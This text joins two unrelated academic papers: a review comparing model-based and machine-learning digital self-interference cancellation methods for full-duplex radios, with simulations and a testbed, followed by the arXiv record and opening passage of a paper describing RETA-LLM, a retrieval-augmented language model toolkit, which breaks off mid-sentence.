# On the Learning of Digital Self-Interference Cancellation in Full-Duplex Radios ###### Abstract Full-duplex communication systems have the potential to achieve significantly higher data rates and lower latency compared to their half-duplex counterparts. This advantage stems from their ability to transmit and receive data simultaneously. However, to enable successful full-duplex operation, the primary challenge lies in accurately eliminating strong self-interference (SI). Overcoming this challenge involves addressing various issues, including the nonlinearity of power amplifiers, the time-varying nature of the SI channel, and the non-stationary transmit data distribution. In this article, we present a review of recent advancements in digital self-interference cancellation (SIC) algorithms. Our focus is on comparing the effectiveness of adaptable model-based SIC methods with their model-free counterparts that leverage data-driven machine learning techniques. Through our comparison study under practical scenarios, we demonstrate that the model-based SIC approach offers a more robust solution to the time-varying SI channel and the non-stationary transmission, achieving optimal SIC performance in terms of the convergence rate while maintaining low computational complexity. To validate our findings, we conduct experiments using a software-defined radio testbed that conforms to the IEEE 802.11a standards. The experimental results demonstrate the robustness of the model-based SIC methods, providing practical evidence of their effectiveness. ## I Introduction Inband full-duplex communications have been widely considered as a potential solution for increasing spectral efficiency in future wireless networks. The fundamental idea behind this approach is to simultaneously transmit and receive data signals at the same frequency [1, 2, 3, 4, 5, 6]. In principle, this approach has the potential to double the spectral efficiency without requiring additional bandwidth. Moreover, when combined with advanced scheduling algorithms, it can also improve the cell and network throughput of unlicensed-band communication systems using listen-before-talk protocols. In practice, however, realizing the potential performance gains is not without challenges, as it is required to cancel a high self-interference (SI) signal at a receiver. In inband full-duplex communications, the transmit signal gives rise to very strong interference to the received signal of interest, which makes SI cancellation (SIC) more complicated. For example, the SI signal strength is about 100 dB larger than the desired signal power [1]. Intuitively, SIC can be achieved by subtracting the transmit from the received signal using the knowledge of the transmit signal waveform. In practice, SI signal cancellation is very challenging because the transmit signal experiences several radio frequency (RF) components such as filters, oscillators, and power amplifiers (PA), which result in linear and non-linear distortions of the transmit signal. In addition, the reflectors surrounding the mobile transceiver can generate time-varying SI signals. Thus, accurate cancellation of the time-varying and nonlinear SI signal is indispensable to enable inband full-duplex radios for next-generation wireless systems. In practical implementation, a SIC block in full-duplex radios typically involves a cascaded approach, utilizing an analog passive SI canceller, an analog active SI canceller, and a digital nonlinear adaptive SI canceller, as shown in Fig. 1. [1, 2, 3]. 
The analog passive SI canceller such as isolation and analog active SI canceller play a crucial role in attenuating the strong self-interference power to a level below the saturation threshold of the analog-to-digital converter (ADC), preventing signal saturation. On the other hand, the digital SIC is designed to further reduce the residual self-interference after analog SIC to the noise power level. Unlike analog SIC, digital SIC needs to address both the nonlinearity effects of the power amplifier (PA) and the time-varying channel response, which renders the digital SIC implementation challenging [1, 7, 8, 9, 10]. The nonlinear SIC problem is mathematically equivalent to nonlinear system identification in adaptive filter theory [11]. Therefore, traditional digital SIC algorithms are primarily based on mathematical models designed using domain knowledge [1, 7, 10, 12, 13]. The key merits of these model-based approaches are their computational efficiency and mathematical interpretability. However, these model-based methods may fail to represent the nonlinear SI channel when model-mismatch effects are pronounced. With the advent of machine learning, there has been a shift towards using data-driven methods, such as kernel-based adaptive filters [13] and deep neural networks (DNN) [10, 12]. These model-free techniques learn the complex SI channel through data-driven methods, utilizing sets of transmit and receive data samples. However, this approach is susceptible to changes in system environments and is less explainable compared to model-based approaches. The question of whether to use modeling or not for nonlinear and time-varying digital SIC is a crucial consideration in implementing SIC algorithms for full-duplex radios. However, despite its significance, most prior studies fail to adequately compare and address this particular topic [1, 7, 10, 12, 13]. In this article, we aim to address this question by highlighting the trade-offs of model-based and data-driven digital SIC algorithms for full-duplex radios. The article is structured as follows. In Section II, we provide an overview of state-of-the-art model-based digital SIC algorithms, focusing on how they utilize models to capture nonlinear distortions in the SI channel. We compare four different model-based digital SIC algorithms, highlighting their strengths and weaknesses in terms of SIC performance and implementation costs. In Section III, we present model-free approaches, which include kernel and DNN-aided SIC algorithms that do not rely on explicit modeling of the SI channel. In Section IV, we compare the performance of model-based and model-free SIC algorithms. In Section V, we evaluate a prototype implementation of the SIC algorithms using a software-defined radio (SDR) testbed compliant with the IEEE 802.11a Wi-Fi standards. Finally, our conclusion is given with a discussion in Section VI. ## II Model-Based Digital SIC Model-based SIC algorithms leverage mathematical formulations to represent the complex characteristics of nonlinear and time-varying SI channels. These are commonly based on domain knowledge such as the input-output relationship of the power amplifier (PA) and the time-varying channel impulse response. There are two important questions when developing model-based SIC algorithms. * How to construct models that represent the SI channel accurately with a small number of model parameters? * How to optimize the model parameters efficiently? The first question is about modeling accuracy and complexity. 
The latter one is about algorithm efficiency. Depending on the modeling and optimization methods, existing SIC algorithms can be categorized into four different types, which will be explained in the sequel and Fig. 2. ### _WH Model with LMS Optimizer_ One widely used approach is harnessing the Wiener-Hammerstein (WH) model [14], which consists of parallel Hammerstein polynomials (HPs) and linear finite impulse response (FIR) filters. This model offers notable advantages for representing SI channels by using domain knowledge. The HPs in the WH model map the transmit signal into multiple nonlinear signals using HP basis functions, allowing for flexible parameterization of the nonlinearity of the PA. Moreover, increasing the order of HPs enhances the model's ability to capture the nonlinear characteristics of the SI channel. The FIR filters in the model capture the dynamics of the linear transfer function in the SI channel, and increasing the number of FIR filter taps provides higher degrees of freedom for adapting to the dynamics of the linear transfer function. Another advantage of the WH model is its transparent relationship with linear systems, making it easier to implement in practical SIC algorithms. In contrast, other nonlinear models such as kernel-based and neural network models often require more complex parameterization. The WH model is utilized to parameterize the SI channel with parallel FIR filter coefficients for a given number of HPs. Consequently, the model parameters, which are the coefficients of the FIR filters, need to be optimized using a set of transmit and receive data samples as training data. The widely used objective for optimizing these parameters is to minimize the mean squared- error (MSE) between the desired and actual signals. In full-duplex radios, online sample-by-sample optimization is necessary to effectively track the dynamics of the SI channel. The least mean squares (LMS) algorithm, a stochastic gradient descent method, is commonly employed for SIC due to its simple implementation [1]. ### _WH Model with RLS Optimizer_ The main limitation of using the WH model in conjunction with LMS algorithms for SIC is the slow convergence rate, resulting from statistical correlations among the nonlinearly transformed signals by the HP basis functions. To address this low rate convergence issue, it is crucial to eliminate the correlation among the transformed signals. One approach is to use the recursive least squares (RLS) algorithm, which adaptively finds FIR filter coefficients to minimize the mean squared error, and offers faster convergence compared to LMS. However, RLS has extremely high computational complexity due to the estimation and inversion of the covariance matrix of transformed signals in an online fashion. Recently, a low-complexity variant of RLS for digital SIC has been proposed in [8], where the covariance matrix is estimated in an offline fashion and its inverse is used for orthogonalizing the transformed signals. Despite the faster convergence speed, this low-complexity RLS approach still requires large system memory to store the covariance matrix, Fig. 1: A block diagram of a full-duplex wireless system cascaded by circulator isolation, analog SIC, and digital SIC blocks. which can be a limitation. Additionally, it is limited to use only when the transmit data symbols are stationary, as it cannot accurately orthogonalize transformed signals in the presence of non-stationary data signals resulting from adaptive modulation and coding techniques. 
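As a concrete illustration of the WH-model canceller of Sec. II-A, the sketch below (ours, not the authors' implementation) builds the Hammerstein-polynomial branches, adapts the parallel FIR coefficients sample by sample, and reports the cancellation gain on a toy nonlinear SI channel. The PA model, channel taps, and the use of a normalized LMS step (a standard, more robust variant of the plain LMS update described above) are illustrative assumptions:

```python
import numpy as np

rng = np.random.default_rng(1)

def hp_basis(x, orders=(1, 3, 5)):
    """Hammerstein-polynomial branches psi_p(x) = x * |x|^(p-1) for odd orders p."""
    return np.stack([x * np.abs(x) ** (p - 1) for p in orders])

def wh_lms_sic(x, d, taps=21, orders=(1, 3, 5), mu=0.5):
    """Digital SIC with a WH model and a sample-by-sample normalized LMS update.

    x : known transmitted baseband samples (reference)
    d : received samples after analog SIC (residual SI plus noise)
    Returns the cancellation error e[n] = d[n] - y[n].
    """
    branches = hp_basis(x, orders)                     # shape: (branches, N)
    w = np.zeros(len(orders) * taps, dtype=complex)    # parallel FIR coefficients
    e = np.zeros_like(d)
    for n in range(taps - 1, len(d)):
        u = branches[:, n - taps + 1:n + 1].ravel()    # stacked regressor
        y = np.dot(w, u)                               # SI estimate
        e[n] = d[n] - y
        w += (mu / (np.real(np.vdot(u, u)) + 1e-12)) * e[n] * np.conj(u)
    return e

# Toy SI: a mildly nonlinear PA followed by a short FIR channel (assumed values).
N = 20000
x = (rng.standard_normal(N) + 1j * rng.standard_normal(N)) / np.sqrt(2)
pa_out = x + 0.05 * x * np.abs(x) ** 2
h = np.array([0.6, 0.3 + 0.2j, 0.1])
d = np.convolve(pa_out, h)[:N] + 1e-3 * (rng.standard_normal(N) + 1j * rng.standard_normal(N))
e = wh_lms_sic(x, d)
print("digital SIC gain (dB):",
      10 * np.log10(np.mean(np.abs(d[-2000:]) ** 2) / np.mean(np.abs(e[-2000:]) ** 2)))
```

The RLS variant of Sec. II-B would additionally pre-whiten the regressor `u` with the inverse of an offline-estimated covariance matrix, an estimate that is only valid while the transmit statistics remain stationary.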
This inaccurate covariance information can degrade the performance of SIC. ### _WIH Model with LMS Optimizer_ The Wiener-Ito-Hermite (WIH) model is an alternative method that uses Ito-Hermite polynomials (IHPs) instead of HPs to represent the SI channel. The IHPs have the intriguing property that the transformed signals by the IHPs are statistically orthogonal, provided that the transmit data follows a complex Gaussian distribution. This property is advantageous for full-duplex communication systems that use orthogonal frequency division multiplexing (OFDM) because the central limit theorem ensures that the distribution of OFDM converges to a complex Gaussian distribution for a large enough fast Fourier transform (FFT) size. The orthogonal property of the WIH model allows for the use of a simple LMS optimizer, which achieves the optimal convergence rate of SIC performance for full-duplex systems while having low computational complexity [9]. However, when the input signal distribution does not follow a complex Gaussian distribution, such as in the case of a single-carrier (SC) waveform with conventional quadrature amplitude modulation (QAM) symbols, the SIC algorithm using the WIH model combined with LMS optimizer slows down the convergence significantly because the orthogonal structure of the IHPs is destroyed. ### _Adaptive WH Model with LMS Optimizer_ SI canceller that employs the WIH-LMS algorithm faces a major obstacle in that the algorithm requires the input to follow a complex Gaussian distribution. While this is generally true in an OFDM system, it may not be accurate for single-carrier systems where the input distribution may vary due to adaptive modulation and coding on a packet-to-packet basis. To address this issue, the adaptive orthonormal polynomial LMS (AOP-LMS) algorithm has been recently proposed [15]. This algorithm is a powerful extension of the WIH-LMS algorithm, designed to tackle non-stationary and arbitrary transmit data distributions. Unlike the WIH-LMS algorithm, which uses the HPs as the basis functions, the AOP-LMS algorithm generates a set of orthonormal basis functions using the moments of the input distribution. This makes it better suited to handle input distributions that may change over time. To estimate the moment parameter, the AOP-LMS algorithm uses a sample mean estimator, which requires a small number of training samples. The orthonormal property of the basis functions enables the simple LMS optimizer to achieve the optimal convergence rate for SIC in full-duplex systems while maintaining low computational complexity. Thanks to these advantages, the AOP-LMS algorithm is a highly effective tool for handling non-stationary and arbitrary input distributions in a variety of applications. ## III Data-Driven Digital SIC In this section, we review recent advancements in model-free SIC algorithms that leverage machine learning techniques. The popularity of model-free approaches for digital SIC is on the rise due to the increasing abundance of datasets and the enhanced power of modern deep learning pipelines. The Fig. 2: Block diagrams of the model-based and the model-free digital SIC algorithms. primary objective of model-free SIC techniques is to learn the expected output from a vast amount of input data. In contrast to model-based approaches that leverage domain knowledge for the nonlinear SI channel, model-free frameworks treat the nonlinear SIC channel as a black box and train their parameters using input and output data points. 
## III Data-Driven Digital SIC In this section, we review recent advancements in model-free SIC algorithms that leverage machine learning techniques. The popularity of model-free approaches for digital SIC is on the rise due to the increasing abundance of datasets and the enhanced power of modern deep learning pipelines. The primary objective of model-free SIC techniques is to learn the expected output from a vast amount of input data. In contrast to model-based approaches that leverage domain knowledge for the nonlinear SI channel, model-free frameworks treat the nonlinear SI channel as a black box and train their parameters using input and output data points. The key factor in model-free SIC algorithms is their ability to train the black box accurately. However, the major challenge is that the algorithm and the trained function should be adaptable to track the time-varying SI channel. Overall, the success of the model-free SIC approach lies in its capacity to learn effectively from data and adapt to the evolving SI channel.
Fig. 2: Block diagrams of the model-based and the model-free digital SIC algorithms.
### _Data-Driven Kernel Model with LMS Optimizer_ A data-driven approach to modeling the nonlinear SI channel is to use kernel-based methods in reproducing kernel Hilbert spaces (RKHSs) [13]. In statistical learning theory, an unknown function defined over an RKHS can be represented as a finite linear combination of kernel products evaluated on the input points in the training data. Selecting an appropriate reproducing kernel function with continuous, symmetric, and positive definite properties is crucial. The Gaussian kernel is a commonly used choice for kernel adaptive filters due to its universal modeling capability, desirable smoothness, and numerical stability. Its properties make it a suitable choice for representing the nonlinear SI channel using data-driven methods. The kernel least-mean-square (K-LMS) algorithm is a modified version of the LMS algorithm which operates on an RKHS. While the traditional LMS algorithm operates on a finite-dimensional vector space, K-LMS operates on an infinite-dimensional space, which makes it more effective in nonlinear signal processing tasks. However, the naive K-LMS method suffers from a major drawback: it requires the optimization of an enormous number of parameters. This is because the algorithm expresses the parameters as a linear combination of all previous and current input data, each weighted by their corresponding a priori errors. As a result, storing all past data requires increasing amounts of system memory, as shown in the block diagram of K-LMS in Fig. 2, making it impractical for real-time implementation. Traditionally, the kernel trick in RKHS has been used to implicitly map data into a feature space. However, recent developments have seen the adoption of random featured kernel (RFK) nonlinear maps that explicitly map input data to a finite low-dimensional Euclidean space. RFK enables the creation of kernel adaptive filters that use a fixed number of trainable parameters, making them hardware-friendly. One such algorithm, the RFK-LMS, was proposed in [13]. Although it uses a finite number of trainable parameters, the number required to accurately represent a nonlinear function is generally unknown. Therefore, selecting an insufficient number of trainable parameters could lead to failure in accurately representing the unknown function. Despite its potential benefits, no digital SIC algorithm using RFK-LMS has been proposed in the context of full-duplex systems. We implemented this algorithm for digital SIC and compared its performance with the model-based methods, which will be discussed in Section IV.
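As a minimal sketch of the random-feature idea behind RFK-LMS, the snippet below approximates the Gaussian kernel with an explicit random Fourier feature map of fixed dimension (500 features, matching the configuration used in Section IV) and runs ordinary LMS on those features. The real-valued treatment of the complex regressor and the bandwidth parameter `gamma` are simplifying assumptions of ours.

```python
import numpy as np

rng = np.random.default_rng(0)

def make_rff(dim_in, num_features=500, gamma=1.0):
    """Random Fourier feature map approximating the Gaussian kernel
    k(u, v) = exp(-gamma * ||u - v||^2); num_features fixes the model size up front."""
    W = rng.normal(0.0, np.sqrt(2.0 * gamma), size=(num_features, dim_in))
    b = rng.uniform(0.0, 2.0 * np.pi, size=num_features)
    return lambda u: np.sqrt(2.0 / num_features) * np.cos(W @ u + b)

def rfk_lms(x, y, taps=21, num_features=500, mu=0.01):
    """LMS in the explicit random-feature space: a fixed number of trainable weights,
    unlike K-LMS, whose kernel dictionary grows with every new sample."""
    phi = make_rff(2 * taps, num_features)    # features of the real/imag parts of the last `taps` samples
    w = np.zeros(num_features)
    e = np.zeros(len(x))
    for n in range(taps, len(x)):
        u = x[n - taps:n]
        z = phi(np.concatenate([u.real, u.imag]))
        e[n] = y[n].real - w @ z              # real-part-only sketch; complex handling is omitted
        w += mu * e[n] * z
    return e
```

Because the feature dimension is fixed in advance, the memory footprint no longer grows with the number of processed samples, which is precisely what makes the random-feature variant more hardware-friendly than K-LMS.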
### _Deep Neural Networks with Adam Optimizer_ DNNs are highly flexible architectures that have shown great promise in modeling nonlinear SI channels with trainable parameters. This makes them an attractive alternative for modeling the nonlinear SI channel without any prior knowledge of the PA nonlinearity [12]. Despite being model-free, however, DNNs require an offline training procedure, meaning that their parameters need to be pre-trained before performing SIC. Moreover, the DNN parameters need to be updated according to time variations in the channel and the transmit data distribution. Unfortunately, implementing sample-by-sample updates of the DNN parameters can be challenging, which limits the applicability of adaptive nonlinear filters with sequential inputs. Therefore, although DNNs are a powerful tool for modeling the SI channel, addressing their offline training requirement and limited applicability in time-varying and non-stationary transmit data scenarios is crucial to fully leverage their potential in practical systems. In a recent study [10], a promising approach that combines DNNs and an adaptive method was proposed. This approach uses a DNN to model the nonlinear distortion introduced by the PA, while a linear channel estimator helps to track channel variations. More specifically, the approach uses not only the transmit data but also the estimated linear channel information as the input of the network to track the channel variation. However, a common drawback of DNN-based SIC algorithms is the huge complexity of their offline training process. The DNN parameters need to be trained on numerous cases to cover the variations in the channel, which hinders practical real-time full-duplex radio implementation under non-stationary scenarios. ## IV Performance Evaluation In this section, we provide a SIC performance comparison for the model-based and model-free algorithms discussed in Sections II and III. From the comparison, we provide a discussion on the existing digital SIC algorithms with respect to important implementation aspects, including model complexity, training complexity, convergence speed, SIC performance, channel adaptation, and the non-stationary distribution of transmit signals, as summarized in Table I. ### _Simulation Setups_ In our simulations, the transmitter considers both OFDM and SC transmissions with quadrature amplitude modulation (QAM) symbols. The transmit power is set to 20 dBm, while the received SI signal power after the analog SIC is assumed to be about -50 dBm, and the noise power is -90 dBm. The nonlinearity of the system is designed using the PA modeling described in [14]. To assess robustness to variations in the channel and the transmit data distribution, we conducted an experiment where the transmitter sent the first 4400 symbols using OFDM, followed by 1024-QAM symbols for the remaining duration. The channel varies every 2200 symbols.
Fig. 3: The residual SI power comparison according to the various SIC methods.
Fig. 4: A snapshot of the real-time implementation testbed with the NI-PXI SDR platform.
### _Complexity Comparison_ * **WH-LMS**[1]: The model complexity is measured by the number of filter coefficients used in the LMS algorithm. In our WH-LMS implementation, three parallel FIR filters are employed for a 5th-order model, each with a length of 21 coefficients. Consequently, the model complexity of this algorithm amounts to 63 coefficients. * **WH-RLS**[8]: The WH-RLS algorithm stores the input of the 3 parallel filters for each symbol input and calculates the sample covariance. Then, the eigen-decomposition of the sample covariance is harnessed for the input orthogonalization.
Therefore, the model complexity of the WH-RLS algorithm is equivalent to that of the WH-LMS algorithm, but additional computations are required in each iteration compared to the WH-LMS algorithm. * **WIH-LMS**[9]: The WIH-LMS algorithm assumes a complex Gaussian input. As no additional computations are required for the input orthogonalization, the WIH-LMS algorithm operates with the same model complexity as the WH-LMS algorithm. * **AOP-LMS**[15]: The AOP-LMS algorithm stores the input in the same manner as the WH-RLS algorithm, but it does not require the eigen-decomposition for input orthogonalization. Thanks to the low-complexity Gram-Schmidt-based input orthogonalization, its additional computational cost is lower than that of the WH-RLS algorithm. * **K-LMS**[13]: The number of filter coefficients to be estimated in the kernel-based algorithm equals the number of kernels employed. Since the K-LMS algorithm evaluates the latest input against all historical inputs through a Gaussian kernel function, it operates with a total of 8800 kernels, so its model complexity is 8800. Moreover, because each new kernel input is generated from both past and current data, additional computations and memory are required to form these inputs. * **RFK-LMS**[13]: Rather than comparing the new input with all previous inputs, RFK-LMS evaluates it against a predetermined collection of randomly generated points through a Gaussian kernel function. With this collection of size 500, the model complexity of the RFK-LMS algorithm is 500. * **DNN with Adam optimizer**[12]: Since the model-based algorithms use a filter length of 21, the DNN uses 21 input nodes for a balanced comparison; because the Adam optimizer operates on real numbers, this count doubles to 42. The architecture has a single hidden layer with 200 nodes. In total, 9002 coefficients are estimated (8800 weights and 202 biases), giving a DNN model complexity of 9002. The network was trained for 30,000 epochs on a training dataset of 2200 randomly generated instances. * **Adaptive DNN with Adam optimizer**[10]: To enhance adaptability, channel values are added to the network input, so the input comprises the data and its corresponding channel pair, for a total of 84 input nodes. To accommodate the greater input diversity, the number of hidden nodes is increased to 300. The adaptive DNN's model complexity is 26,102 parameters, comprising 25,800 weights and 302 biases. The network was trained for 40,000 epochs on a training dataset of 8800 randomly generated instances. ### _Performance Comparison_ Fig. 3 clearly illustrates the limitations of model-free approaches in canceling nonlinear SI signals. The kernel-based algorithms exhibit subpar attenuation of approximately 10 dB to 20 dB. The DNN-aided SIC technique shows good SIC performance, but it cannot track the channel variations.
Even though the adaptive DNN-aided SIC technique employing the Adam optimizer shows the most effective SIC among the model-free frameworks, its SIC performance is inferior to the model-based algorithms, and it carries a significantly higher complexity and requires an offline training process. Conversely, the WH-LMS algorithm achieves an impressive attenuation of more than 35 dB due to its ability to match the nonlinear PA model. However, it suffers from a slow convergence rate. To address this issue, the WH-RLS, WIH-LMS, and AOP-LMS algorithms incorporate orthogonalization gains in their basis functions, resulting in a rapid convergence rate and achieving noise-level SIC power within approximately 2000 iterations. While the WIH-LMS algorithm exhibits a slightly slower convergence rate due to a distribution mismatch between the Gaussian signal and the OFDM modulated signal, its low complexity remains acceptable. Among the algorithms, only the AOP-LMS algorithm maintains noise-level SIC even after variations in the input distribution. Notably, the AOP-LMS algorithm stands out as it attains optimal SIC power, a nearly optimal convergence rate, and robustness to channel and input distribution variations in a full-duplex system, all while maintaining reasonable computational complexity. Therefore, it is prudent to leverage model-based approaches when prior knowledge of the system model is available and the model mismatch effect is not pronounced, as model-free approaches may not yield favorable outcomes in such scenarios.
Fig. 5: Scatter plots and power spectral density of the received and the residual SI signals after performing SIC.
## V Real-Time Implementation We implemented a full-duplex testbed adhering to the IEEE 802.11a standard. The implementation operates at a center frequency of 2.4 GHz with a system bandwidth of 10 MHz. The transmit symbols are generated using an OFDM waveform. For this testbed, both the transmitter and receiver are equipped with omni-directional single antennas, while the noise floor level at the baseband of the system is approximately -100 dBm. In this testbed, we implemented the model-based algorithms for SIC without knowing the true PA model, in order to validate the model-based approach when PA modeling error exists. For more information on the experimental results, we refer to our website [https://wireless-x.korea.ac.kr/full-duplex-radios](https://wireless-x.korea.ac.kr/full-duplex-radios). Fig. 5 presents a snapshot of the received SI signal power and the corresponding power spectral density (PSD) for the model-based SIC algorithms. The results clearly demonstrate that the WIH-LMS and AOP-LMS algorithms outperform the WH-LMS algorithm due to their superior model selection that incorporates orthogonality. In such a scenario, we can observe that the WH-LMS algorithm fails to converge adequately while the WIH-LMS and AOP-LMS converge. It is important to note that the AOP-LMS algorithm aligns with the WIH-LMS algorithm when the transmit signal follows a complex Gaussian distribution, such as in the case of OFDM signaling. Our implementation results indicate that both the AOP-LMS and WIH-LMS algorithms can be practical solutions that exhibit the best convergence performance in SIC even when the PA model is unknown. ## VI Conclusion and Discussion This article provided a comparison of state-of-the-art digital SIC algorithms for full-duplex radios by focusing on the advantages and disadvantages of model-based and data-driven approaches.
By conducting a thorough comparative study, we highlighted the numerous benefits associated with adopting a model-based approach for SIC algorithms in full-duplex systems. Utilizing prior knowledge of the system model, a model-based approach demonstrated superior SIC performance while effectively optimizing implementation costs, especially when considering practical scenarios with minimal model mismatch effects. However, in cases where modeling errors are prominent, the data-driven approach emerges as a more favorable option compared to model-based methods. Employing DNNs, the data-driven approach can be an effective strategy for implementing SIC algorithms in full-duplex radios. To further enhance the advancements in data-driven SIC techniques, particularly in the context of time-varying full-duplex radio systems, the integration of few-shot learning or online learning algorithms can play a pivotal role. These techniques pave the way for the development of more generalized full-duplex communication in future wireless systems.
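For readers who want to reproduce the kind of comparison shown in Fig. 3, the following minimal sketch computes the block-averaged residual-SI curve, i.e. the attenuation a canceller achieves over time, from a received capture and the canceller's residual output; the dBm normalization and block length are illustrative assumptions of ours rather than part of the original evaluation setup.

```python
import numpy as np

def power_dbm(sig):
    """Average power of a baseband capture in dB relative to 1 mW, assuming the samples
    are already scaled so that |s|^2 is expressed in milliwatts (a sketch-level convention)."""
    return 10.0 * np.log10(np.mean(np.abs(sig) ** 2))

def residual_si_curve(y_before, e_after, block=500):
    """Block-averaged attenuation in dB: the gap between the received SI power and the
    residual power after cancellation, tracked over time as in a convergence plot."""
    n_blocks = min(len(y_before), len(e_after)) // block
    curve = []
    for b in range(n_blocks):
        s = slice(b * block, (b + 1) * block)
        curve.append(power_dbm(y_before[s]) - power_dbm(e_after[s]))
    return np.array(curve)
```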
2306.05212
RETA-LLM: A Retrieval-Augmented Large Language Model Toolkit
Although Large Language Models (LLMs) have demonstrated extraordinary capabilities in many domains, they still have a tendency to hallucinate and generate fictitious responses to user requests. This problem can be alleviated by augmenting LLMs with information retrieval (IR) systems (also known as retrieval-augmented LLMs). Applying this strategy, LLMs can generate more factual texts in response to user input according to the relevant content retrieved by IR systems from external corpora as references. In addition, by incorporating external knowledge, retrieval-augmented LLMs can answer in-domain questions that cannot be answered by solely relying on the world knowledge stored in parameters. To support research in this area and facilitate the development of retrieval-augmented LLM systems, we develop RETA-LLM, a RETrieval-Augmented LLM toolkit. In RETA-LLM, we create a complete pipeline to help researchers and users build their customized in-domain LLM-based systems. Compared with previous retrieval-augmented LLM systems, RETA-LLM provides more plug-and-play modules to support better interaction between IR systems and LLMs, including request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules. Our toolkit is publicly available at https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM.
Jiongnan Liu, Jiajie Jin, Zihan Wang, Jiehan Cheng, Zhicheng Dou, Ji-Rong Wen
2023-06-08T14:10:54Z
http://arxiv.org/abs/2306.05212v1
# RETA-LLM: A Retrieval-Augmented Large Language Model Toolkit ###### Abstract Although Large Language Models (LLMs) have demonstrated extraordinary capabilities in many domains, they still have a tendency to hallucinate and generate fictitious responses to user requests. This problem can be alleviated by augmenting LLMs with information retrieval (IR) systems (also known as retrieval-augmented LLMs). Applying this strategy, LLMs can generate more factual texts in response to user input according to the relevant content retrieved by IR systems from external corpora as references. In addition, by incorporating external knowledge, retrieval-augmented LLMs can answer in-domain questions that cannot be answered by solely relying on the world knowledge stored in parameters. To support research in this area and facilitate the development of retrieval-augmented LLM systems, we develop RETA-LLM, a RETreival-Augmented LLM toolkit. In RETA-LLM, we create a complete pipeline to help researchers and users build their customized in-domain LLM-based systems. Compared with previous retrieval-augmented LLM systems, RETA-LLM provides more plug-and-play modules to support better interaction between IR systems and LLMs, including request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules. Our toolkit is publicly available at [https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM](https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM). ## 1 Introduction Large language models (LLMs) have attracted increasing attention from both research community and industry Brown et al. (2020); OpenAI (2023); Ouyang et al. (2022); Touvron et al. (2023); Chowdhery et al. (2022); Zhao et al. (2023); Zeng et al. (2022). With tremendous world knowledge stored in parameters Petroni et al. (2019); Roberts et al. (2020); Jiang et al. (2020) and the Reinforcement Learning from Human Feedback (RLHF) techniques Christiano et al. (2017); Ziegler et al. (2019), LLMs can generate helpful, detailed, and polite texts in response to user inputs. Many studies have demonstrated LLMs' extraordinary abilities in various areas, including nature language processing Moslem et al. (2023), information retrieval Sun et al. (2023); Wang et al. (2023); Mao et al. (2023), and recommendation Hou et al. (2023); Zhang et al. (2023). However, LLMs still tend to hallucinate and sometimes generate texts opposite to facts Zhou et al. (2021); Zhao et al. (2023). To tackle these problems, researchers have proposed a new paradigm to strengthen LLMs with information retrieval systems (retrieval-augmented LLMs) Shi et al. (2023); Jiang et al. (2023); Nakano et al. (2022), which enables LLMs to retrieve relevant contents from an external repository (knowledge corpus) to generate texts based on them. It has been verified that retrieval-augmented LLMs can generate texts in response to user input with fewer hallucinations Nakano et al. (2022). Furthermore, by incorporating customized private data resources, retrieval-augmented LLMs can respond to in-domain queries that cannot be answered by LLMs trained with public data. To support research in this area and help users build their own in-domain LLM-based systems, we devise RETA-LLM, a **RET**reival-**A**ugmented LLM toolkit. Different from previous general LLM-enhanced toolkits such as LangChain,1 RETA-LLM focuses on the retrieval-augmented LLMs and provides more plug-in modules. 
Typically, retrieval-augmented LLMs use a retrieve-and-generate strategy with two modules: First, they retrieve documents or passages based on user request (**document retrieval** module); then, they generate answers utilizing these relevant documents as references (**answer generation** module). In addi tion to these two basic modules, our RETA-LLM provides three optional modules: (1) a **request rewriting** module to make user's current request more complete and clear; (2) a **passage extraction** module to extract relevant passages or fragments from the whole retrieved document contents; and (3) a **fact checking** module to verify whether there exist factual errors in the generated answers. These optional modules can make the interaction between IR systems and LLMs more effective and smooth. The disentanglement between LLMs and IR systems in our RETA-LLM is more thorough, which makes the customization of search engines and LLMs more convenient. Furthermore, to make the usage easier, we provide a complete and ready-to-use pipeline for researchers and users to build their RETA-LLM toolkits based on their own repository for in-domain LLM-based systems from scratch. RETA-LLM is part of YuLan, a open source LLM initiative proposed by Gaoling School of Artificial Intelligence, Renmin University of China. RETA-LLM is still under development and there are many issues that need to be solved with great efforts. We sincerely welcome contributions on this open source toolkit. ## 2 RETA-LLM Framework As aforementioned, compared with Langchain, which is a common LLM-augmented toolkit, our RETA-LLM toolkit focuses specifically on retrieval-augmented LLMs. We provide five plug-in modules in RETA-LLM to interact with LLMs and IR systems. The modules include request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules. The framework of our RETA-LLM is shown in Figure 1. The workflow of RETA-LLM is as follows: First, RETA-LLM uses the request rewriting module to revise the current user request to make it complete and clear. Because users can issue a series of questions to the RETA-LLM, the semantics of the current user request may be incomplete. For example, A user may ask _"How about the School of Economics?"_ while the historical request is _"Introduce the majors in School of Information"_. In this case, the precise meaning of the user is _"Introduce the majors in School of Economics"_. Since LLMs have shown remarkable abilities in rewriting queries in conversational dense retrieval [20], we feed the current user request and the previous conversation histories to LLMs to perform rewriting. Figure 1: The RETA-LLM framework. Examples are taken from an intelligent university information seeking system powered by RETA-LLM. Then, RETA-LLM uses the document retrieval module to retrieve relevant documents from the external corpus based on the revised user request. The document retrieval module is the module connected to the IR system. It retrieves relevant documents from the external knowledge corpus and returns top-\(K\) of them. The \(K\) is set to 3 in our default configuration. We provide a default dense retriever in our repository. The detailed description can be found in the next section. Next, RETA-LLM uses the passage extraction module to extract fragments related to the user request from the retrieved documents to form the references. 
Because of the input length limitations (typically 2048 or 4096 tokens) of LLMs, it is impossible to directly concatenate the contents of all top-\(K\) relevant document contents as references for them to generate answers. Trivial methods by truncating the document contents may lose important information in them. Therefore, we reuse the LLMs themselves to extract related fragments from retrieved documents based on the revised request. Since the length of one document may also exceed the limitations, we apply the sliding window strategy to extract fragments step by step. The sliding window size and step are set to 512 and 256 in our default configuration. These fragments are then concatenated together as the references. Besides, RETA-LLM uses the answer generation module to generate answers for the user request. As previous researches (Nakano et al., 2022; Shi et al., 2023; Jiang et al., 2023) suggest, by feeding the references retrieved from the external corpus, LLMs can generate more factual answers. Finally, RETA-LLM uses the fact checking module to verify whether the generated answers contain factual mistakes and output final responses for the user request. Though providing additional evidence for generation, LLMs may also hallucinate (Nakano et al., 2022). It is necessary to devise a module to conduct further fact verification. Because of the strong natural language understanding abilities of LLMs, we feed the references and generated answers to 